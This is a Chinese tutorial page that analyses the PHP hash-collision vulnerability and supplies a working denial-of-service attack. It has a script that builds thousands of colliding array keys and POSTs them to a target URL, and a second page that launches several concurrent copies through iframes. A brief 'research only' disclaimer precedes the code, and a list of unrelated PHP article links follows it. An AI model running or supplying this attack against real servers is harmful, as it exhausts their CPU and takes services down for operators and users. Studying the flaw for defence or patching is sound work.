PHP利用hash沖突漏洞進(jìn)行DDoS攻擊的方法分析
本文實(shí)例分析了PHP利用hash沖突漏洞進(jìn)行DDoS攻擊的方法。分享給大家供大家參考。具體分析如下:
首先聲明:本文內(nèi)容只用于研究學(xué)習(xí)使用,請(qǐng)勿用于非法行為!
前面提到過最近爆出的hash表碰撞漏洞,包括java、python、php等在內(nèi)的很多常用語(yǔ)言均未幸免,今晚咱就來實(shí)際看看它的威力。
攻擊原理:
通過向目標(biāo)服務(wù)器post一組精心拼湊的數(shù)組參數(shù),到達(dá)服務(wù)端后語(yǔ)言底層處理接收到的數(shù)組參數(shù)時(shí),由于該漏洞的存在造成CPU的大量消耗,最終導(dǎo)致服務(wù)器資源耗盡。
不用什么花哨的手法,就用PHP簡(jiǎn)單實(shí)現(xiàn)下看下效果,點(diǎn)到即止。
文件:dos.php
// 目標(biāo)地址 // 只要目標(biāo)地址存在,不用管它是干嘛的 $host = 'http://127.0.0.1/test.php'; $data = ''; $size = pow(2, 15); for ($key=0, $max=($size-1)*$size; $key<=$max; $key+=$size) { $data .= '&array[' . $key . ']=0'; } $ret = curl($host, ltrim($data,'&')); var_dump($ret); function curl($url, $post, $timeout = 30){ $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout - 5); curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:')); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); $output = curl_exec($ch); if ($output === false) return false; $info = curl_getinfo($ch); $http_code = $info['http_code']; if ($http_code == 404) return false; curl_close($ch); return $output; }
文件:ddos.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>DDOS</title> </head> <body> <?php for($i=0; $i<5; $i++){//并發(fā)數(shù) echo '<iframe src="dos.php?a='.$i.'" scrolling="false" frameborder="1" allowtransparency="true" style="background-color:transparent;"></iframe>'; } ?> </body> </html>
希望本文所述對(duì)大家的php程序設(shè)計(jì)有所幫助。
相關(guān)文章
php+html優(yōu)化頁(yè)面顯示速度的方法小結(jié)
這篇文章主要為大家詳細(xì)介紹了php結(jié)合html優(yōu)化頁(yè)面顯示速度的一些常見方法,文中的示例代碼講解詳細(xì),感興趣的小伙伴可以跟隨小編一起學(xué)習(xí)一下2023-12-12深入理解ob_flush和flush的區(qū)別(ob_flush()與flush()使用方法)
ob_flush()和flush()這兩個(gè)函數(shù)一般要一起使用,順序是先ob_flush(),然后flush(),它們的作用是刷新緩沖區(qū)2013-02-02PHPCrawl爬蟲庫(kù)實(shí)現(xiàn)抓取酷狗歌單的方法示例
這篇文章主要介紹了PHPCrawl爬蟲庫(kù)實(shí)現(xiàn)抓取酷狗歌單的方法,涉及PHPCrawl爬蟲庫(kù)的使用及正則匹配相關(guān)操作技巧,需要的朋友可以參考下2017-12-12PHP中使用協(xié)同程序?qū)崿F(xiàn)合作多任務(wù)
這篇文章指導(dǎo)你通過使用協(xié)同程序來實(shí)施任務(wù)調(diào)度,通過實(shí)例實(shí)現(xiàn)對(duì)技術(shù)的理解。我將在前三節(jié)做一個(gè)簡(jiǎn)單的背景介紹。如果你已經(jīng)有了比較好的基礎(chǔ),可以直接跳到“協(xié)同多任務(wù)處理”一節(jié)2013-07-07PHP中feof()函數(shù)實(shí)例測(cè)試
這篇文章主要介紹了PHP中feof()函數(shù)實(shí)例測(cè)試,需要的朋友可以參考下2014-08-08php輸出控制函數(shù)和輸出函數(shù)生成靜態(tài)頁(yè)面
這篇文章主要為大家詳細(xì)介紹了php輸出控制函數(shù)和輸出函數(shù)生成靜態(tài)頁(yè)面,具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下2019-06-06PHP數(shù)組在底層的實(shí)現(xiàn)原理詳解
這篇文章講給大家詳細(xì)介紹一下PHP數(shù)組在底層的實(shí)現(xiàn)原理,PHP數(shù)組在底層的實(shí)現(xiàn)原理可以分為兩種類型:基于哈希表的實(shí)現(xiàn)和基于有序列表的實(shí)現(xiàn),文中通過代碼示例介紹的非常詳細(xì),具有一定的參考價(jià)值,需要的朋友可以參考下2023-11-11PHP實(shí)現(xiàn)JS中escape與unescape的方法
這篇文章主要介紹了PHP實(shí)現(xiàn)JS中escape與unescape的方法,通過json_encode和json_decode方法實(shí)現(xiàn)JS中escape與unescape函數(shù)的功能,需要的朋友可以參考下2016-07-07php采集自中央氣象臺(tái)范圍覆蓋全國(guó)的天氣預(yù)報(bào)代碼實(shí)例
這篇文章主要介紹了php采集自中央氣象臺(tái)范圍覆蓋全國(guó)的天氣預(yù)報(bào)代碼實(shí)例,較為詳細(xì)的分析了采集的技巧及對(duì)應(yīng)接口的調(diào)用技巧,具有一定參考借鑒價(jià)值,需要的朋友可以參考下2015-01-01